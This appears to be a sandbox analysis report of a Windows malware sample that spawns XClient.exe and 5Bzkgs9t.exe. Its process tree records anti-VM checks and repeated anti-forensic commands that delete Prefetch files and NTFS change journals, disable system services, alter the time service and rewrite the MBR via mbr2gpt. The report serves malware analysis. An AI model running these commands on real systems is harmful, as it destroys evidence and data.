description pid Process Token: SeDebugPrivilege 3708 XClient.exe Token: SeDebugPrivilege 4244 powershell.exe Token: SeDebugPrivilege 1100 powershell.exe Token: SeDebugPrivilege 2804 powershell.exe Token: SeSystemtimePrivilege 392 svchost.exe Token: SeSystemtimePrivilege 392 svchost.exe Token: SeIncBasePriorityPrivilege 392 svchost.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeDebugPrivilege 456 powershell.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 4640 powershell.exe Token: SeSystemEnvironmentPrivilege 436 powershell.exe Token: SeDebugPrivilege 396 powershell.exe Token: SeDebugPrivilege 3448 powershell.exe Token: SeDebugPrivilege 984 powershell.exe Token: SeDebugPrivilege 1680 powershell.exe Token: SeSystemtimePrivilege 392 svchost.exe Token: SeDebugPrivilege 3708 XClient.exe Token: SeDebugPrivilege 3244 powershell.exe Token: SeDebugPrivilege 4904 powershell.exe Token: SeDebugPrivilege 2144 powershell.exe Token: SeSystemtimePrivilege 324 svchost.exe Token: SeSystemtimePrivilege 324 svchost.exe Token: SeIncBasePriorityPrivilege 324 svchost.exe Token: SeSystemtimePrivilege 324 svchost.exe Token: SeDebugPrivilege 4760 powershell.exe Token: SeDebugPrivilege 1872 powershell.exe Token: SeDebugPrivilege 2820 powershell.exe Token: SeDebugPrivilege 1380 powershell.exe Token: SeDebugPrivilege 4772 powershell.exe Token: SeDebugPrivilege 4632 powershell.exe Token: SeTakeOwnershipPrivilege 2312 ReAgentc.exe Token: SeBackupPrivilege 4976 MBR2GPT.EXE Token: SeRestorePrivilege 4976 MBR2GPT.EXE Token: SeSecurityPrivilege 4976 MBR2GPT.EXE Token: SeRestorePrivilege 4976 MBR2GPT.EXE Token: SeRestorePrivilege 4976 MBR2GPT.EXE Token: SeDebugPrivilege 4688 powershell.exe Token: SeDebugPrivilege 948 powershell.exe Token: SeDebugPrivilege 4424 powershell.exe Token: SeRestorePrivilege 4720 vds.exe Token: SeDebugPrivilege 948 powershell.exe Token: SeDebugPrivilege 4216 powershell.exe Token: SeDebugPrivilege 4380 XClient.exe Token: SeDebugPrivilege 4300 powershell.exe Token: SeDebugPrivilege 448 powershell.exe Token: SeDebugPrivilege 4100 powershell.exe Token: SeDebugPrivilege 4540 powershell.exe Token: SeDebugPrivilege 5508 powershell.exe Token: SeDebugPrivilege 6028 powershell.exe Token: SeDebugPrivilege 5188 powershell.exe Token: SeDebugPrivilege 720 powershell.exe Token: SeDebugPrivilege 5112 powershell.exe Token: SeDebugPrivilege 4764 powershell.exe Token: SeDebugPrivilege 5292 powershell.exe Token: SeDebugPrivilege 5360 powershell.exe Token: SeDebugPrivilege 5476 powershell.exe Token: SeDebugPrivilege 3468 powershell.exe Token: SeDebugPrivilege 5548 powershell.exe Token: SeDebugPrivilege 1104 powershell.exe Token: SeDebugPrivilege 5424 powershell.exe Token: SeDebugPrivilege 5560 powershell.exe Token: SeDebugPrivilege 5844 powershell.exe Token: SeDebugPrivilege 2420 powershell.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4552 5Bzkgs9t.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 4552 5Bzkgs9t.exe 3708 XClient.exe 4552 5Bzkgs9t.exe 4552 5Bzkgs9t.exe 4552 5Bzkgs9t.exe 4552 5Bzkgs9t.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1072 wrote to memory of 4552 1072 fwanufwa.exe 83 PID 1072 wrote to memory of 4552 1072 fwanufwa.exe 83 PID 1072 wrote to memory of 3708 1072 fwanufwa.exe 84 PID 1072 wrote to memory of 3708 1072 fwanufwa.exe 84 PID 4552 wrote to memory of 4244 4552 5Bzkgs9t.exe 89 PID 4552 wrote to memory of 4244 4552 5Bzkgs9t.exe 89 PID 3708 wrote to memory of 1100 3708 XClient.exe 93 PID 3708 wrote to memory of 1100 3708 XClient.exe 93 PID 4552 wrote to memory of 1512 4552 5Bzkgs9t.exe 96 PID 4552 wrote to memory of 1512 4552 5Bzkgs9t.exe 96 PID 1512 wrote to memory of 1932 1512 net.exe 98 PID 1512 wrote to memory of 1932 1512 net.exe 98 PID 3708 wrote to memory of 2804 3708 XClient.exe 99 PID 3708 wrote to memory of 2804 3708 XClient.exe 99 PID 4552 wrote to memory of 3516 4552 5Bzkgs9t.exe 101 PID 4552 wrote to memory of 3516 4552 5Bzkgs9t.exe 101 PID 4552 wrote to memory of 4016 4552 5Bzkgs9t.exe 174 PID 4552 wrote to memory of 4016 4552 5Bzkgs9t.exe 174 PID 4552 wrote to memory of 3696 4552 5Bzkgs9t.exe 105 PID 4552 wrote to memory of 3696 4552 5Bzkgs9t.exe 105 PID 3696 wrote to memory of 4684 3696 net.exe 107 PID 3696 wrote to memory of 4684 3696 net.exe 107 PID 4552 wrote to memory of 2116 4552 5Bzkgs9t.exe 110 PID 4552 wrote to memory of 2116 4552 5Bzkgs9t.exe 110 PID 4552 wrote to memory of 456 4552 5Bzkgs9t.exe 111 PID 4552 wrote to memory of 456 4552 5Bzkgs9t.exe 111 PID 4552 wrote to memory of 436 4552 5Bzkgs9t.exe 112 PID 4552 wrote to memory of 436 4552 5Bzkgs9t.exe 112 PID 3708 wrote to memory of 4640 3708 XClient.exe 116 PID 3708 wrote to memory of 4640 3708 XClient.exe 116 PID 4552 wrote to memory of 3812 4552 5Bzkgs9t.exe 118 PID 4552 wrote to memory of 3812 4552 5Bzkgs9t.exe 118 PID 3708 wrote to memory of 396 3708 XClient.exe 120 PID 3708 wrote to memory of 396 3708 XClient.exe 120 PID 4552 wrote to memory of 1372 4552 5Bzkgs9t.exe 122 PID 4552 wrote to memory of 1372 4552 5Bzkgs9t.exe 122 PID 4552 wrote to memory of 1584 4552 5Bzkgs9t.exe 124 PID 4552 wrote to memory of 1584 4552 5Bzkgs9t.exe 124 PID 4552 wrote to memory of 4724 4552 5Bzkgs9t.exe 165 PID 4552 wrote to memory of 4724 4552 5Bzkgs9t.exe 165 PID 4552 wrote to memory of 3448 4552 5Bzkgs9t.exe 128 PID 4552 wrote to memory of 3448 4552 5Bzkgs9t.exe 128 PID 4552 wrote to memory of 984 4552 5Bzkgs9t.exe 157 PID 4552 wrote to memory of 984 4552 5Bzkgs9t.exe 157 PID 4552 wrote to memory of 1680 4552 5Bzkgs9t.exe 132 PID 4552 wrote to memory of 1680 4552 5Bzkgs9t.exe 132 PID 4552 wrote to memory of 3624 4552 5Bzkgs9t.exe 135 PID 4552 wrote to memory of 3624 4552 5Bzkgs9t.exe 135 PID 4552 wrote to memory of 4668 4552 5Bzkgs9t.exe 187 PID 4552 wrote to memory of 4668 4552 5Bzkgs9t.exe 187 PID 4552 wrote to memory of 2036 4552 5Bzkgs9t.exe 139 PID 4552 wrote to memory of 2036 4552 5Bzkgs9t.exe 139 PID 4552 wrote to memory of 820 4552 5Bzkgs9t.exe 141 PID 4552 wrote to memory of 820 4552 5Bzkgs9t.exe 141 PID 4552 wrote to memory of 5020 4552 5Bzkgs9t.exe 143 PID 4552 wrote to memory of 5020 4552 5Bzkgs9t.exe 143 PID 4552 wrote to memory of 4460 4552 5Bzkgs9t.exe 145 PID 4552 wrote to memory of 4460 4552 5Bzkgs9t.exe 145 PID 3708 wrote to memory of 2904 3708 XClient.exe 147 PID 3708 wrote to memory of 2904 3708 XClient.exe 147 PID 4552 wrote to memory of 1816 4552 5Bzkgs9t.exe 148 PID 4552 wrote to memory of 1816 4552 5Bzkgs9t.exe 148 PID 820 wrote to memory of 4672 820 net.exe 149 PID 820 wrote to memory of 4672 820 net.exe 149 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fwanufwa.exe"C:\Users\Admin\AppData\Local\Temp\fwanufwa.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\ProgramData\5Bzkgs9t.exe"C:\ProgramData\5Bzkgs9t.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command Remove-Item 'C:\ProgramData\5Bzkgs9t.exe.bak' -force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4244
-
-
C:\Windows\SYSTEM32\net.exenet stop w32time3⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop w32time4⤵PID:1932
-
-
-
C:\Windows\SYSTEM32\w32tm.exew32tm /unregister3⤵PID:3516
-
-
C:\Windows\SYSTEM32\w32tm.exew32tm /register3⤵
- Sets DLL path for service in the registry
PID:4016
-
-
C:\Windows\SYSTEM32\net.exenet start w32time3⤵
- Suspicious use of WriteProcessMemory
PID:3696 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start w32time4⤵PID:4684
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (GWMI Win32_Processor).VirtualizationFirmwareEnabled3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "$env:firmware_type"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "confirm-securebootuefi"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:3812
-
-
C:\Windows\SYSTEM32\w32tm.exew32tm /resync /force3⤵PID:1372
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:1584
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵
- Launches sc.exe
PID:4724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:3624
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:4668
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Enumerates connected drives
PID:2036
-
-
C:\Windows\SYSTEM32\net.exenet stop w32time3⤵
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop w32time4⤵PID:4672
-
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵
- Launches sc.exe
PID:5020
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵
- Launches sc.exe
PID:4460
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵
- Launches sc.exe
PID:1816
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:2056
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:872
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:3580
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:1820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3244 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4724
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵PID:768
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Enumerates connected drives
PID:4632
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:4016
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:2752
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵
- Launches sc.exe
PID:3468
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:1296
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵
- Launches sc.exe
PID:4928
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:3840
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:4668
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:1808
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:1820
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:4308
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:816
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:4484
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵
- Launches sc.exe
PID:1940
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:1476
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:3540
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:392
-
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵
- Launches sc.exe
PID:1372
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:4092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1380 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4760
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4632
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:4012
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Enumerates connected drives
PID:3252
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Enumerates connected drives
PID:4548
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:3464
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1940
-
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵
- Launches sc.exe
PID:4428
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:2424
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵
- Launches sc.exe
PID:2260
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reagentc /enable3⤵PID:3676
-
C:\Windows\system32\ReAgentc.exereagentc /enable4⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mbr2gpt /convert /allowFullOS3⤵PID:920
-
C:\Windows\system32\MBR2GPT.EXEmbr2gpt /convert /allowFullOS4⤵
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:2752
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵
- Launches sc.exe
PID:2672
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵PID:2056
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:4332
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:4516
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵
- Launches sc.exe
PID:3836
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:968
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:984
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:3928
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:1904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵PID:4768
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:3940
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:4628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4300
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵PID:656
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Enumerates connected drives
PID:4452
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Enumerates connected drives
PID:684
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:4260
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:3468
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵
- Launches sc.exe
PID:4936
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:4404
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:2088
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵
- Launches sc.exe
PID:1908
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:324
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Enumerates connected drives
PID:4764
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Enumerates connected drives
PID:4392
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵
- Launches sc.exe
PID:3792
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵
- Launches sc.exe
PID:948
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵
- Launches sc.exe
PID:3224
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵
- Launches sc.exe
PID:3396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.diskpart.com/features/convert-mbr-gpt.html3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4036 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9365146f8,0x7ff936514708,0x7ff9365147184⤵PID:4100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,13535255263110697643,4976725457456784480,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:24⤵PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,13535255263110697643,4976725457456784480,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:34⤵PID:4628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,13535255263110697643,4976725457456784480,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:84⤵PID:4740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,13535255263110697643,4976725457456784480,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:14⤵PID:1388
-
-
